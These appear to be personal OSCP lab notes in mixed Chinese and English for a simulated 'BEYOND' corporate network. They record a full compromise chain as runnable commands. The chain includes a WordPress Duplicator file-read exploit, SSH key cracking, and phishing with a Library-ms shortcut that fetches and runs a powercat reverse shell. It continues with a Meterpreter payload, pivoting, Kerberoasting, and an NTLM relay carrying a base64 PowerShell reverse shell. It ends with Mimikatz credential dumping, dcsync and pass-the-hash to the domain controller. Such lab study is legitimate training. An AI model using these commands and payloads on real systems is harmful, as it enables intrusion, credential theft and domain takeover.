24. Assembling the Pieces

[WDavid404]

• 24.1. Enumerating the Public Network
• 24.2. Attacking a Public Machine
• 24.3. Gaining Access to the Internal Network
• 24.4. Enumerating the Internal Network
• 24.5. Attacking an Internal Web Application
• 24.6. Gaining Access to the Domain Controller

[WDavid404]

24.1. Enumerating the Public Network

• Enumerate machines on a public network
• Obtain useful information to use for later attacks

Environment：There are two servers (MAILSRV1 and MAILSRV1) on the public network connecting with our Kali.

Port scan for servers one by one.

sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
## -oN to create an output file containing the scan results.
## -sC to use Nmap's default scripts

check hMailServer on CVE ==> no useful info

Next, let's enumerate the IIS web server. First, we'll browse the web page. Let's try to identify directories and files by using gobuster

kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config

==> no useful info

[WDavid404]

Tools:

• whatweb

[WDavid404]

nmap for MAILSVR1

nmap -sV -sC -o mailsrv1.txt 192.168.188.242

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:01 EST
Nmap scan report for 192.168.188.242
Host is up (0.27s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE    SERVICE       VERSION
25/tcp   open     smtp          hMailServer smtpd ==> hMailServer!
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open     http          Microsoft IIS httpd 10.0  ==> Noted!
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
110/tcp  open     pop3          hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
143/tcp  open     imap          hMailServer imapd
|_imap-capabilities: QUOTA ACL RIGHTS=texkA0001 IMAP4rev1 IDLE completed CAPABILITY IMAP4 OK CHILDREN NAMESPACE SORT
445/tcp  open     microsoft-ds?
587/tcp  open     smtp          hMailServer smtpd
| smtp-commands: MAILSRV1, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
2160/tcp filtered apc-2160
Service Info: Host: MAILSRV1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-02-29T12:03:01
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.29 seconds

==> Search hMailserver on CVE https://www.cvedetails.com/vulnerability-list/vendor_id-8442/product_id-14780/Hmailserver-Hmailserver.html

Namp for WEBSVR1

nmap -sV -sC -o websvr1.txt 192.168.188.244

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-29 07:07 EST
Nmap scan report for 192.168.188.244
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4f:c8:5e:cd:62:a0:78:b4:6e:d8:dd:0e:0b:8b:3a:4c (ECDSA)
|_  256 8d:6d:ff:a4:98:57:82:95:32:82:64:53:b2:d7:be:44 (ED25519)
80/tcp   open     http    Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: WordPress 6.0.2
| http-title: BEYOND Finances – We provide financial freedom
|_Requested resource was http://192.168.188.244/main/
|_http-server-header: Apache/2.4.52 (Ubuntu)
1121/tcp filtered rmpp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.46 seconds

==>. View page source ---> It use wordpress

wpscan --url http://192.168.188.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan cat websrv1_wpscan|grep -i "The version is out of date" -B4

用searchexploit依次查找这些plugin，发现只有duplicator 和 Elementor存在可利用的exploit模块 ![image](https://github.com/WDavid404/OSCP/assets/137129330/36335f3d-ba61-46d0-add1-5a7dc5ab995

用 searchsploit -x ＜module名＞ 来查看具体的内容，发现还是duplicator的exploit好用 使用50420.py：

searchsploit -m 50420.py
python3 50420.py http://192.168.188.244 /etc/passwd  
==>可以work，并发现daniela和marcus两个user

#取得用户的id_rsa (/home/<user>/.ssh/id_rsa)
python3 50420.py http://192.168.188.244 /home/daniela/.ssh/id_rsa
==> copy到本地文件id_rsa里 (别忘了设定permission：chmod 600 id_rsa)

利用id_rsa文件尝试ssh登陆websvr1

ssh -i ./id_rsa daniela@192.168.188.244
Enter passphrase for key './id_rsa': 

==》 破解ssh的passphrase。 https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625

ssh2john id_rsa > ssh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
# 破解结果出来： tequieromucho

利用破解结果，ssh login成功！

在WEBSVR1内部

daniela@websrv1:~$ ip a 发现这个服务器没有连接内网

在WEBSVR1里，用linPEAS.sh 工具自动搜索 linPEAS.sh工具 （https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS）

• 下载网址： https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b

WEBSERV1里用 daniela@websrv1:~$ wget -qc http://192.168.45.204:9000/linpeas.sh 从Kali下载 然后

daniela@websrv1:~$ chmod a+x ./linpeas.sh
daniela@websrv1:~$ ./linpeas.sh

关注里面的几个信息：

• Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
• Analyzing Wordpress Files (limit 70)
• Analyzing Github Files (limit 70)

利用上面“Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d”信息，进行privilege escalation 获得root权限后， let's search the Git repository for sensitive information first.

root@websrv1:/home/daniela# cd /srv/www/wordpress/

root@websrv1:/srv/www/wordpress# git status
HEAD detached at 612ff57
nothing to commit, working tree clean

root@websrv1:/srv/www/wordpress# git log
commit 612ff5783cc5dbd1e0e008523dba83374a84aaf1 (HEAD -> master)
Author: root <root@websrv1>
Date:   Tue Sep 27 14:26:15 2022 +0000

    Removed staging script and internal network access

commit f82147bb0877fa6b5d8e80cf33da7b8f757d11dd
Author: root <root@websrv1>
Date:   Tue Sep 27 14:24:28 2022 +0000

    initial commit

root@websrv1:/srv/www/wordpress# git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1

==》 收集到了jon的credentials信息

利用目前收集到的user list和password list对MAILSVR1进行尝试

crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success ==》MAILSRV1 is a domain-joined machine and we have identified a valid set of domain credentials for jon

This provides us with two options：

1. We can further enumerate SMB on MAILSRV1 and check for sensitive information on accessible shares

2. we can prepare a malicious attachment and send a phishing email as john to daniela and marcus.

   尝试第一个办法 crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares ---》 No useful info

所以，只好采用第2种办法：send a phishing email as john to daniela and marcus.

phishing email

1. 准备一个webdav server

   
   kali@kali:~$ mkdir /home/kali/beyond/webdav
   kali@kali:~$ /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/

血泪教训： webdav的端口必须用80，否则后面动作会不成功！

2. 登陆一台WindowsPC来制作Windows Lib文件（config.Library-ms）和shortcut文件
Connect WINPREP via RDP as offsec with a password of lab in order to prepare the Windows Library and shortcut files.

<?xml version="1.0" encoding="UTF-8"?>

@windows.storage.dll,-34582 6 true imageres.dll,-1003 {7d49d726-3c21-4f05-99aa-fdc2c9474656} true false http://192.168.45.204 ==》！！注意这里的IP和port

注意：config.Library-ms文件保存到kali后里面内容会变，要注意手动恢复回来。

在WinPC的桌面上新建一个shortcut（名字为configuration等都可以）
shorcut内容指定为如下，然后把shorcut拷贝到Kali的webdav里（双击config文件，也就指向了webdav目录里）

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204:9000/powercat.ps1'); powercat -c 192.168.45.204 -p 4444 -e powershell"

--》即将会从kali的9000 port（对应http.server的port）里下载一个powercat.ps文件并通过执行它向kali的4444 port发送reverse shell信息

在Kali上准备好
- webdav目录下放置powercat.ps1 文件(/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1)
_血泪注意: 网上下载的powercat.ps1不好用，还是在kali里搜索吧： find / -name powercat.ps1 2>/dev/null_
- 在webdav目录里 python3 -m http.server 9000
- nc -lvp 4444
- body.txt文件，内容任意。

then, 

kali@kali:~/beyond$ sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

--server 指定的是MAILSRV的地址

--ap to enable password authentication (没有--ap的话不行，nc接收不到reverse信息)

Username: john Password: dqsTwTpZPn#nL === Trying 192.168.50.242:25... === Connected to 192.168.50.242. <- 220 MAILSRV1 ESMTP -> EHLO kali <- 250-MAILSRV1 <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> AUTH LOGIN <- 334 VXNlcm5hbWU6 -> am9obg== <- 334 UGFzc3dvcmQ6 -> ZHFzVHdUcFpQbiNuTA== <- 235 authenticated. -> MAIL FROM:john@beyond.com <- 250 OK -> RCPT TO:marcus@beyond.com <- 250 OK -> DATA <- 354 OK, send. -> 36 lines sent <- 250 Queued (1.088 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host.

nc上会收到一个internal pc（CLIENTWK1）来的reverse shell （IP：172.16.74.243）

### scan CLIENTWK1 by winPEAS
kali上准备一个winpeas.exe文件 （下载网址： https://github.com/carlospolop/PEASS-ng/releases/tag/20240226-e0f9d47b
 --》 下载winPEASx64.exe）

PS C:\Windows\System32\WindowsPowerShell\v1.0> cd C:\Users\marcus PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/winPEASx64.exe -Outfile winPEAS.exe PS C:\Users\marcus> .\winPEAS.exe .\winPEAS.exe ...

查看下面信息：
- AV Information （是否有AV在动作）
- Network Ifaces and known hosts
- DNS cached

### scan CLIENTWK1 by Sharphound
Kali机器上： cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
CLIENTWK1机器上：

PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/SharpHound.ps1 -Outfile SharpHound.ps1 PS C:\Users\marcus> powershell -ep bypass PS C:\Users\marcus> . .\SharpHound.ps1 PS C:\Users\marcus> Invoke-BloodHound -CollectionMethod All

分析结果，得知下面的info
1. 
![image](https://github.com/WDavid404/OSCP/assets/137129330/3706e113-d721-49bf-a395-67841f12f4a9)
2. The SPN for daniela is http/internalsrv1.beyond.com
3. A domain administrator：beccy and beccy has an active session on MAILSRV1

Then，set up a SOCKS5 proxy to perform network enumeration via Nmap and CrackMapExec in order to identify accessible services, open ports, and SMB settings.
`kali@kali:~/beyond$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.204 LPORT=443 -f exe -o met.exe
`

 start a multi/handler listener with the corresponding settings in Metasploit.

kali@kali:~/beyond$ sudo msfconsole -q

msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.45.204 LHOST => 192.168.119.5

msf6 exploit(multi/handler) > set LPORT 443 LPORT => 443

msf6 exploit(multi/handler) > set ExitOnSession false -->It specifies that the listener stays active for new sessions without the need to restart it for every incoming session. ExitOnSession => false

msf6 exploit(multi/handler) > run -j [*] Exploit running as background job 0.

on CLIENTWK1.

PS C:\Users\marcus> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe PS C:\Users\marcus> .\met.exe

In Metasploit, a new session should appear: 
`[*] Meterpreter session 1 opened (192.168.119.5:443 -> 192.168.50.242:64234) at 2022-10-11 07:05:22 -0400`
Once session 1 is opened, we can use multi/manage/autoroute and auxiliary/server/socks_proxy to create a SOCKS5 proxy to access the internal network 

msf6 exploit(multi/handler) > use multi/manage/autoroute msf6 post(multi/manage/autoroute) > set session 1 session => 1 msf6 post(multi/manage/autoroute) > run .. msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf6 auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf6 auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 2.

确认SOCKS5配置如下

kali@kali:~/beyond$ cat /etc/proxychains4.conf ... socks5 127.0.0.1 1080

对内网机器进行扫描 用crackmapexec
`kali@kali:~/beyond$ proxychains -q crackmapexec smb 172.16.74.240-241 172.16.74.244 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares`
结果：
1.  john doesn't have actionable or interesting permissions on any of the discovered shares
2. MAILSRV1 and INTERNALSRV1 have SMB signing set to False --》 Without this security mechanism enabled, we can potentially perform relay attacks if we can force an authentication request.

对内网机器进行扫描 用nmap （注意：只能用-sT）
`kali@kali:~/beyond$ sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.74.240 172.16.74.241 172.16.74.243`
==》 172.16.74.241 有80，443 port

使用Chisel访问172.16.74.241的80 port web server
use Chisel in server mode to receive incoming connections on port 8080.

下载chisel到目前目录 （https://github.com/jpillora/chisel/releases/tag/v1.9.1，下载windows amd64那个 和 linux的） 对于linux版本的chisel kali@kali:~/beyond$ chmod a+x chisel kali@kali:~/beyond$./chisel server -p 8080 --reverse

上传windows版本的chisel.exe to CLIENTWK1 by using Meterpreter's upload command.

msf6 auxiliary(server/socks_proxy) > sessions -i 1 [*] Starting interaction with 1... meterpreter > upload chisel.exe C:\Users\marcus\chisel.exe

Now, we can enter shell and utilize Chisel in client mode to connect back to our Kali machine on port 8080.
`C:\Users\marcus> chisel.exe client 192.168.45.204:8080 R:80:172.16.74.241:80
注意：Kali上关闭webdav server因为它在用着80 port
`
这样，在Kali上可以用浏览器访问127.0.0.1从而打开172.16.74.241的web page
为了访问http://127.0.0.1/wordpress/wp-admin ， 需要修改下面的config

kali@kali:~/beyond$ cat /etc/hosts
127.0.0.1 localhost 127.0.1.1 kali ... 127.0.0.1 internalsrv1.beyond.com 《---这个 ...

在http://127.0.0.1/wordpress/wp-admin 页面上，可以用daniela的credentail登陆

### 获得daniela的credentials info
`kali@kali:~/beyond$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john`
--》 获得daniela的hash
破解之得到daniela的密码DANIelaRO123
`kali@kali:~/beyond$ sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force`

用daniela：DANIelaRO123 登陆 http://127.0.0.1/wordpress/wp-admin
进入wordpress的plugin页面
点击“Backup Migration”的“manage”

[WDavid404]

Relay attack to MAILSRV1

1. kali上启动下面command kali@kali:~/beyond$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.188.242 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0ACIALAA0ADQANAA4ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" 上面对应的one-line command原文是 $client = New-Object System.Net.Sockets.TCPClient("192.168.45.204",4448);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

   

2. kali上启动 nc -vlpn 4448 等待接收reverse shell

3. wordpress的backup migration plugin页面里，输入//192.168.45.204/test （注意：test目录在kali上不需要实际存在） 然后点击save按钮

---》 从而 nc -vlpn 4448 可以进入MAILSVR1的shell里

在MAILSVR1里

PS C:\Windows\system32> cd C:\Users\Administrator
PS C:\Users\Administrator> iwr -uri http://192.168.45.204:9000/met.exe -Outfile met.exe
PS C:\Users\Administrator> .\met.exe

In Kali Metasploit, we should receive a new incoming session.

[*] Sending stage (200774 bytes) to 192.168.50.242
[*] Meterpreter session 2 opened (192.168.119.5:443 -> 192.168.50.242:50814)

msf6 post(multi/manage/autoroute) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1006]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator> powershell

Next, we'll download the current Mimikatz version on Kali and serve it via our Python3 web server on port 8000. On MAILSRV1, we'll download Mimikatz with iwr and launch it. mimikatz获取位置：/usr/share/windows-resources/mimikatz/x64/mimikatz.exe （版本是 mimikatz 2.2.0 (x64) #19041） ⚠️ 别从github里下载mimikatz，sekurlsa::logonpasswords时会报错 ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

PS C:\Users\Administrator>iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
注意：如果被告诉iwr命令无法识别，要注意是否已经启动了powershell。iwr是powershell里的command

PS C:\Users\Administrator> .\mimikatz.exe

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords
==》 获得beccy的NTLM和password信息

注意： 
在 MAILSVR上执行 mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator  是取不到信息的
--》 因为现在login MAILSVR的daniela不是domain administration用户

login to DC

kali@kali:~$ proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.74.240

进入DC后通过iwr传输mimikatz （最好先传输met.exe， 然后在metasploit上操作），

powershell
iwr -uri http://192.168.45.204:9000/mimikatz.exe -Outfile mimikatz.exe
PS C:\Users\Administrator> .\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:beyond.com /user:Administrator

## For fun, 
## `lsadump::dcsync /domain:beyond.com /user:Administrator /all` will dump all domain user NTLM||